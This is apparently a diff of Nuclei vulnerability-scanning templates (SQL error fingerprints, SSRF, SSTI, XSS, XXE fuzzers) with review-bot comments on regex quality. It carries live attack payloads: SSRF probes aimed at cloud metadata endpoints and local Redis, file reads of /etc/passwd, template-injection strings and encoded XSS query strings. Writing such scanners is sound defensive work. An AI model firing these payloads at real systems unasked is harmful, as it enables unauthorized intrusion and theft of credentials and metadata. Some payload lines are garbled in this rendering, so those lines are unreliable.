+ - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: mariadb + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: memsql + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: postgresql + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: microsoftsqlserver + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." 
+ - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: microsoftaccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: ibmdb2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + + - type: regex + name: sqlite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + 
- "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: sapmaxdb + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: frontbase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + + - type: regex + name: hsqldb + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: h2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: monetdb + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: apachederby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - 
"com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: mimersql + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: cratedb + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: raimadatabasemanager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" diff --git a/http/fuzzing/dast/ssrf/blind-ssrf.yaml b/http/fuzzing/dast/ssrf/blind-ssrf.yaml new file mode 100644 index 0000000000..c1214fb959 --- /dev/null +++ b/http/fuzzing/dast/ssrf/blind-ssrf.yaml @@ -0,0 +1,40 @@ +id: blind-ssrf + +info: + name: Blind SSRF OAST Detection + author: pdteam + severity: medium + tags: ssrf,dast,oast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + ssrf: + - "{{interactsh-url}}" + - "{{FQDN}}.{{interactsh-url}}" + - "{{RDN}}.{{interactsh-url}}" + + fuzzing: + - part: query + mode: single + values: + - "https?://" # Replace HTTP URLs with alternatives + fuzz: + - "https://{{ssrf}}" + + - part: query + mode: single + values: + - "^[A-Za-z0-9-._]+:[0-9]+$" # Replace : with alternative + fuzz: + - "{{ssrf}}:80" + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/http/fuzzing/dast/ssrf/response-ssrf.yaml b/http/fuzzing/dast/ssrf/response-ssrf.yaml new file mode 100644 index 0000000000..f10572e049 --- /dev/null +++ b/http/fuzzing/dast/ssrf/response-ssrf.yaml 
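Review bot: Several extractor patterns diverge from their matcher twins: the `mysql` extractor has `SQLSTATE[\\d+]: Syntax error or access violation` (a character class matching one digit or `+`) where the matcher has `SQLSTATE\\[\\d+\\]: Syntax error or access violation`, and the `frontbase` extractor escapes the range as `\\[1-4\\]` where the matcher correctly uses `[1-4]`; copy the matcher forms so the DBMS fingerprint fires on the same responses as the detection. `<REGEX_LITERAL>` under Mckoi, present in both the matcher and the `mckoi` extractor, is a leftover placeholder that matches nothing useful and should be removed or replaced with the real pattern. `name: drizzel` is a typo for `drizzle`, and `sqlite3.OperationalError:` has an unescaped dot. The `# False Positive` comment sits below the `negative: true` line; move it above the `Adminer` matcher it explains.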
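Review bot: The single matcher accepts only `interactsh_protocol` equal to `http`, so a target whose egress permits DNS resolution but blocks outbound HTTP resolves the callback name and is then discarded. If that is deliberate (a DNS-only interaction being too weak a signal on its own), record it next to the matcher: `# http only: a DNS-only interaction is not treated as confirmation`; otherwise add `- "dns"` to `words` so the weaker signal is at least surfaced.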
@@ -0,0 +1,127 @@ +id: response-ssrf + +info: + name: Full Response SSRF Detection + author: pdteam,pwnhxl,j4vaovo + severity: high + reference: + - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py + tags: ssrf,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + ssrf: + - 'http://{{interactsh-url}}' + - 'http://{{FQDN}}.{{interactsh-url}}' + - 'http://{{RDN}}.{{interactsh-url}}' + - 'file:////./etc/./passwd' + - 'file:///c:/./windows/./win.ini' + - 'http://metadata.tencentyun.com/latest/meta-data/' + - 'http://100.100.100.200/latest/meta-data/' + - 'http://169.254.169.254/latest/meta-data/' + - 'http://169.254.169.254/metadata/v1' + - 'http://127.0.0.1:22' + - 'http://127.0.0.1:3306' + - 'dict://127.0.0.1:6379/info' + + fuzzing: + - part: query + mode: single + keys: + - callback + - continue + - data + - dest + - dir + - domain + - feed + - file + - host + - html + - imgurl + - navigation + - next + - open + - out + - page + - path + - port + - redirect + - reference + - return + - show + - site + - to + - uri + - url + - val + - validate + - view + - window + fuzz: + - "{{ssrf}}" + + - part: query + mode: single + values: + - "(https|http|file)(%3A%2F%2F|://)(.*?)" + fuzz: + - "{{ssrf}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + + - type: word + part: body + words: + - "Interactsh Server" + + - type: regex + part: body + regex: + - 'SSH-(\d.\d)-OpenSSH_(\d.\d)' + + - type: regex + part: body + regex: + - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)' + + - type: regex + part: body + regex: + - '(\d.\d.\d)(.*?)mysql_native_password' + + - type: regex + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + part: body + words: + - 'for 16-bit app support' + + - type: regex + part: body + regex: + - 'dns-conf\/[\s\S]+instance\/' + + - type: regex + part: body + regex: + - 'app-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'ami-id[\s\S]+placement\/' + 
+ - type: regex + part: body + regex: + - 'id[\s\S]+interfaces\/' diff --git a/http/fuzzing/dast/ssti/reflection-ssti.yaml b/http/fuzzing/dast/ssti/reflection-ssti.yaml new file mode 100644 index 0000000000..2c4424afbf --- /dev/null +++ b/http/fuzzing/dast/ssti/reflection-ssti.yaml @@ -0,0 +1,51 @@ +id: reflection-ssti + +info: + name: Reflected SSTI Arithmetic Based + author: pdteam + severity: medium + reference: + - https://github.com/zaproxy/zap-extensions/blob/2d9898900abe85a47b9fe0ceb85ec39070816b98/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java + - https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update + tags: ssti,dast,fuzz + +variables: + first: "{{rand_int(1000, 9999)}}" + second: "{{rand_int(1000, 9999)}}" + result: "{{to_number(first)*to_number(second)}}" + +http: + - method: GET + path: + - "{{BaseURL}}" + + skip-variables-check: true + payloads: + ssti: + - '{{concat("${", "{{first}}*{{second}}", "}")}}' + - '{{concat("{{", "{{first}}*{{second}}", "}}")}}' + - '{{concat("<%=", "{{first}}*{{second}}", "%>")}}' + - '{{concat("{", "{{first}}*{{second}}", "}")}}' + - '{{concat("{{{", "{{first}}*{{second}}", "}}}")}}' + - '{{concat("${{", "{{first}}*{{second}}", "}}")}}' + - '{{concat("#{", "{{first}}*{{second}}", "}")}}' + - '{{concat("[[", "{{first}}*{{second}}", "]]")}}' + - '{{concat("{{=", "{{first}}*{{second}}", "}}")}}' + - '{{concat("[[${", "{{first}}*{{second}}", "}]]")}}' + - '{{concat("${xyz|", "{{first}}*{{second}}", "}")}}' + - '{{concat("#set($x=", "{{first}}*{{second}}", ")${x}")}}' + - '{{concat("@(", "{{first}}*{{second}}", ")")}}' + - '{{concat("{@", "{{first}}*{{second}}", "}")}}' + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{ssti}}" + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "{{result}}" 
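Review bot: The last regex, `'id[\s\S]+interfaces\/'`, is far looser than its neighbours: `id` followed by anything up to `interfaces/` matches ordinary HTML that has an `id=` attribute and a link into a path containing `interfaces/`, and under `matchers-condition: or` that alone produces a finding. Anchor it to a metadata-specific token the way `ami-id` and `app-id` are anchored, or drop it. The `(\d.\d)` and `(\d.\d.\d)` groups in the SSH and MySQL matchers use unescaped dots; `(\d\.\d)` says what is meant.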
diff --git a/http/fuzzing/dast/xss/dom-xss.yaml b/http/fuzzing/dast/xss/dom-xss.yaml new file mode 100644 index 0000000000..c8fc864ff3 --- /dev/null +++ b/http/fuzzing/dast/xss/dom-xss.yaml @@ -0,0 +1,45 @@ +id: dom-xss + +info: + name: DOM Cross Site Scripting + author: theamanrawat + severity: medium + tags: xss,dom,dast,fuzz + +variables: + num: "{{rand_int(10000, 99999)}}" + +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + - action: waitload + + payloads: + reflection: + - "'\">

{{num}}

" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

{{num}}

" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/fuzzing/dast/xss/reflected-xss.yaml b/http/fuzzing/dast/xss/reflected-xss.yaml new file mode 100644 index 0000000000..c46ea8d3bb --- /dev/null +++ b/http/fuzzing/dast/xss/reflected-xss.yaml @@ -0,0 +1,39 @@ +id: reflected-xss + +info: + name: Reflected Cross Site Scripting + author: pdteam + severity: medium + tags: xss,rxss,dast,fuzz + +variables: + first: "{{rand_int(10000, 99999)}}" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + reflection: + - "'\"><{{first}}" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{reflection}}" + + - type: word + part: header + words: + - "text/html" diff --git a/http/fuzzing/dast/xxe/fuzz-xxe.yaml b/http/fuzzing/dast/xxe/fuzz-xxe.yaml new file mode 100644 index 0000000000..00ecca6669 --- /dev/null +++ b/http/fuzzing/dast/xxe/fuzz-xxe.yaml @@ -0,0 +1,50 @@ +id: fuzz-xxe + +info: + name: XXE Fuzzing + author: pwnhxl + severity: medium + reference: + - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py + tags: dast,xxe,fuzz + +variables: + rletter: "{{rand_base(6,'abc')}}" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + xxe: + - ' ]>&{{rletter}};' + - ' ]>&{{rletter}};' + + fuzzing: + - part: query + keys-regex: + - "(.*?)xml(.*?)" + fuzz: + - "{{xxe}}" + + - part: query + values: + - "(" + fuzz: + - "{{xxe}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: regex + name: linux + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + name: windows + part: body + words: + - 'for 16-bit app support' \ No newline at end of file diff --git a/http/vulnerabilities/generic/xss-fuzz.yaml b/http/vulnerabilities/generic/xss-fuzz.yaml index 4e0291ab94..bfdc836c0f 100644 
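Review bot: In this rendering the `reflection` payload and the body `words` entry are split across lines with their tag characters missing, so the exact marker cannot be reviewed here and should be checked in the committed file. Assuming it is a tag wrapping `{{num}}`, a `part: body` word match in headless mode shows that the marker survived into the rendered DOM, which is evidence of unescaped reflection into markup rather than of a DOM sink executing it; the name `DOM Cross Site Scripting` overstates that. A comment above `matchers:` such as `# matches the marker in the rendered DOM; does not prove script execution` would set expectations for triage.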
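Review bot: The second fuzzing rule's `values: - "("` is, as rendered here, a lone parenthesis; if `values` entries are compiled as regular expressions (the `keys-regex` field above points that way), an unbalanced `(` fails to compile and the rule never runs — a literal match would need `"\\("`. The payload lines in this view have clearly lost their `<...>` text, so this may be the same rendering artifact and is worth confirming against the committed file. The file also ends without a trailing newline (`\ No newline at end of file`).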
--- a/http/vulnerabilities/generic/xss-fuzz.yaml +++ b/http/vulnerabilities/generic/xss-fuzz.yaml 
@@ -3,49 +3,52 @@ id: xss-fuzz info: name: Fuzzing Parameters - Cross-Site Scripting author: kazet - severity: high - description: Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests. + severity: medium + description: | + Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests. classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 cwe-id: CWE-79 metadata: max-request: 29 parameters: "q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year" - tags: xss,generic,fuzz + tags: xss,generic http: - method: GET path: - - "{{BaseURL}}/?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E" - - 
"{{BaseURL}}/?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E" - - "{{BaseURL}}/?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E" - - 
"{{BaseURL}}/?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E" - - "{{BaseURL}}/?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E" - - 
"{{BaseURL}}/?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E" - - "{{BaseURL}}/?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E" - - 
"{{BaseURL}}/?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E" - - "{{BaseURL}}/?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E" - - 
